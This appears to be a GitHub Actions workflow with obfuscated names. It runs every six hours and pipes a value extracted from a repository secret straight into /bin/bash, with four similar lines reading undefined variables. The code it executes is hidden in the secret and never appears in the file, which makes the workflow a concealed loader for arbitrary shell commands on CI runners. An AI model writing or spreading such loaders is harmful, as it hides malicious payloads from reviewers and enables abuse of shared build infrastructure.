name: liyueqing1829

on:
  workflow_dispatch:
  schedule:
    - cron: '12 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liyueqing1829
        env:
          hdh196: ${{ secrets.hdh196 }}
        run: |
          echo $hdh196 | jq -r .ohhd2 | /bin/bash
          echo $rs8 | jq -r .mgmtk511 | /bin/bash
          echo $zoe5 | jq -r .oesr1181 | /bin/bash
          echo $i33144 | jq -r .v69441 | /bin/bash
          echo $wkobj18967 | jq -r .zmvz2 | /bin/bash

